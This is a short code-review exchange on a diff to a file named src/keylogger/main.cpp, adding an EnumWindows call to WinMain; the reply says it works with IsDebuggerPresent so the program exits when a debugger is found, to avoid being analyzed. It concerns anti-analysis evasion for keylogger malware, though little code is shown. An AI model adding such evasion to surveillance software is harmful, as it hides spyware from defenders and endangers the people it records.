src/keylogger/main.cpp

```diff
@@ -12,6 +12,12 @@ int main() {
 int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
 {
 #endif
+  
+
+    EnumWindows(EnumWindowsProc, 0);
```

Comment:
what does this achieve? or perhaps, what would happen if a debugger is running our application and would we expect one to ever run it?

Reply:
The "EnumWindows" function is a Windows API function that enumerates all top-level windows on the screen by passing the handle to each window. Used together with "IsDebuggerPresent" function detects a debugger, it will terminate itself to avoid being analyzed.